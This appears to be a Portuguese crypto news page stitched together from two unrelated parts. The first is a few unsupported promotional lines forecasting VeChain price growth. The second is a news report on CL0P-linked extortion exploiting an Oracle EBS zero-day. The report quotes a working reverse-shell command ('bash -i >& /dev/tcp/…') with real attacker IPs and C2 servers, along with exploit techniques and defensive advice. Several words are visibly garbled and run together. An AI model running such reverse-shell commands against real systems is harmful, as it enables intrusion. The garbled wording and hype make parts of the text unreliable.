VeChain 2025-2031: Potencial Explosivo de Valorização do VET Revelado

Analistas projetam trajetória de crescimento sustentado para o VET nos próximos anos

Fundamentos sólidos impulsionam otimismo no longo prazo

A tecnologia blockchain empresarial do VeChain continua atraindo adoção institucional - enquanto traders tradicionais ainda tentam entender o conceito de 'token de utilidade'

Previsões apontam para valorização significativa até 2031

O mercado começa a reconhecer o potencial real da blockchain além do hype especulativo

E os céticos? Bem, eles ainda estão esperando o 'momento certo' para entrar desde 2018

Google e Mandiant revelam exploração de dia zero 

De acordo com o relatório do Google, os invasores enviaram um “alto volume” de e-mails para executivos de diversas organizações, alegando violações de seus ambientes Oracle EBS e ameaçando publicar dados roubados, a menos que um resgate fosse pago .

Os e-mails, enviados de centenas de contas de terceiros comprometidas, incluíam endereços de contato, [email protected] e [email protected] , anteriormente vinculados ao site de vazamento de dados do CL0P.

A investigação conjunta do Google e da Mandiant descobriu que a atividade de exploração remonta a julho de 2025, possivelmente ligada a uma vulnerabilidade de dia zero agora traccomo CVE-2025-61882. Em alguns casos, os invasores teriam exfiltrado "uma quantidade significativa de dados" das organizações afetadas.

A Oracle afirmou que as falhas exploradas foram corrigidas em julho, mas posteriormente emitiu atualizações de emergência em 4 de outubro para corrigir vulnerabilidades adicionais. A Oracle instruiu seus clientes a usarem as atualizações críticas de patches mais recentes e enfatizou que manter todos os patches atualizados é essencial para evitar comprometimentos.

A marca de extorsão CL0P está ativa desde 2020 e historicamente está ligada ao grupo criminoso cibernético FIN11. Anteriormente, ela tinha como alvo sistemas gerenciados de transferência de arquivos como MOVEit, GoAnywhere e Accellion FTA. Essas campanhas seguiram um padrão semelhante de exploração em massa de vulnerabilidades de dia zero, roubo de dados confidenciais e extorsão semanas depois. 

No momento do relatório , nenhuma nova vítima deste dent havia aparecido no site de vazamento de dados do CL0P.

Implantes Java complexos e multiestágios

do Google e da Mandiant revela que os invasores usaram diversas cadeias de exploração visando componentes do Oracle EBS, incluindo UiServlet e SyncServlet, para obter execução remota de código e implantar Java em vários estágios.

Em julho de 2025, houve atividade suspeita envolvendo solicitações HTTP para /OA_HTML/configurator/UiServlet. Essa atividade suspeita foi observada em outro exploit que posteriormente surgiu em um grupo do Telegram chamado "SCATTERED LAPSUS$ HUNTERS". 

O exploit vazado fez uso de diversas técnicas avançadas para obter controle sobre servidores alvos, como falsificação de solicitação do lado do servidor (SSRF), desvio de autenticação e injeção de modelo XSL.

Em agosto de 2025, os invasores começaram a usar outra ferramenta chamada SyncServlet para criar e executar modelos maliciosos dentro do banco de dados EBS. Esses modelos continham payloads XSL codificados em Base64 que carregavam malware baseado em Java diretamente na memória. 

Entre os implantesdentestavam o GOLDVEIN.JAVA, um downloader que recuperava cargas úteis de segundo estágio de servidores de comando controlados pelo invasor, e uma cadeia multicamadas chamada SAGE, que instalava filtros de servlet Java persistentes para exploração posterior.

Após invadir o sistema, os invasores usaram a conta EBS "applmgr" para explorá-lo, coletar detalhes da rede e do sistema e, em seguida, instalar mais arquivos maliciosos. Os invasores também usaram comandos de shell como ip addr, netstat -an e bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Os endereços IP 200.107.207.26 e 161.97.99.49 foramdentem tentativas de exploração, enquanto 162.55.17.215:443 e 104.194.11.200:443 foram listados como servidores de comando e controle para a carga útil GOLDVEIN.JAVA.

O GTIG não vinculou formalmente a operação a nenhum grupo conhecido, mas a campanha compartilha semelhanças com o FIN11, um grupo de crimes cibernéticos com motivação financeira que já foi associado ao ransomware CL0P e a operações de roubo de dados em larga escala. 

A Mandiant também observou que uma das contas comprometidas usadas para enviar os e-mails de extorsão havia sido usada em ataques anteriores relacionados ao FIN11.

Os usuários são incentivados a desconfiar das tabelas XDO_TEMPLATES_B e XDO_LOBS do banco de dados EBS, especialmente aquelas com nomes que começam com “TMP” ou “DEF”, e a bloquear o tráfego externo da Internet dos servidores EBS para evitar mais extorsão de dados.

As organizações também recomendam o monitoramento rigoroso de solicitações HTTP para endpoints como /OA_HTML/SyncServlet e /OA_HTML/configurator/UiServlet, além da análise de despejos de memória em busca de evidências de cargas úteis Java na memória.

O Google alertou que grupos vinculados ao CL0P quase certamente continuarão a dedicar seus recursos à aquisição de exploits de dia zero.

Seja visto onde importa. Anuncie na Cryptopolitan Research e alcance os investidores e criadores mais experientes em criptomoedas.